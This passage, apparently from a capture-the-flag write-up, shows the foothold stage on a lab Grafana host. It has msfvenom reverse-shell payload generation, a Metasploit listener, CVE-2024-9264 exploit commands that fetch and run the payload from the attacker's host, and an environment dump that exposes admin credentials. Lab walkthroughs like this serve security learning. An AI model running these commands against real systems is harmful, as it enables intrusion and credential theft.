Foothold

Last updated 13 hours ago

Was this helpful?

❯ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4443 -f elf > shell.elf [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 130 bytes Final size of elf file: 250 bytes

❯ msfconsole -q -x 'use exploit/multi/handler;set payload linux/x64/meterpreter/reverse_tcp;set LHOST tun0; set LPORT 4443; run' [*] Using configured payload generic/shell_reverse_tcp payload => linux/x64/meterpreter/reverse_tcp LHOST => tun0 LPORT => 4443 [*] Started reverse TCP handler on 10.10.14.3:4443

❯ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c 'wget http://10.10.14.3/shell.elf' http://grafana.planning.htb [+] Logged in as admin:0D5oT70Fq13EvB5r [+] Executing command: wget http://10.10.14.3/shell.elf [+] Successfully ran duckdb query: [+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('wget http://10.10.14.3/shell.elf >/tmp/grafana_cmd_output 2>&1 |'): [+] Successfully ran duckdb query: [+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'): --2025-06-07 01:46:21-- http://10.10.14.3/shell.elf Connecting to 10.10.14.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 250 [application/octet-stream] Saving to: 'shell.elf' 0K 100% 26.2K=0.009s 2025-06-07 01:46:21 (26.2 KB/s) - 'shell.elf' saved [250/250]

❯ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c 'chmod +x shell.elf' http://grafana.planning.htb [+] Logged in as admin:0D5oT70Fq13EvB5r [+] Executing command: chmod +x shell.elf [+] Successfully ran duckdb query: [+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('chmod +x shell.elf >/tmp/grafana_cmd_output 2>&1 |'): [+] Successfully ran duckdb query: [+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):

❯ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c './shell.elf' http://grafana.planning.htb [+] Logged in as admin:0D5oT70Fq13EvB5r [+] Executing command: ./shell.elf ⠸ Running duckdb query

❯ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c 'env' http://grafana.planning.htb [+] Logged in as admin:0D5oT70Fq13EvB5r [+] Executing command: env [+] Successfully ran duckdb query: [+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('env >/tmp/grafana_cmd_output 2>&1 |'): [+] Successfully ran duckdb query: [+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'): GF_PATHS_HOME=/usr/share/grafana HOSTNAME=7ce659d667d7 SHLVL=0 AWS_AUTH_EXTERNAL_ID= HOME=/usr/share/grafana AWS_AUTH_AssumeRoleEnabled=true GF_PATHS_LOGS=/var/log/grafana GF_PATHS_PROVISIONING=/etc/grafana/provisioning GF_PATHS_PLUGINS=/var/lib/grafana/plugins PATH=/usr/local/bin:/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin AWS_AUTH_AllowedAuthProviders=default,keys,credentials GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT! AWS_AUTH_SESSION_DURATION=15m GF_SECURITY_ADMIN_USER=enzo GF_PATHS_DATA=/var/lib/grafana GF_PATHS_CONFIG=/etc/grafana/grafana.ini AWS_CW_LIST_METRICS_PAGE_LIMIT=500 PWD=/usr/share/grafana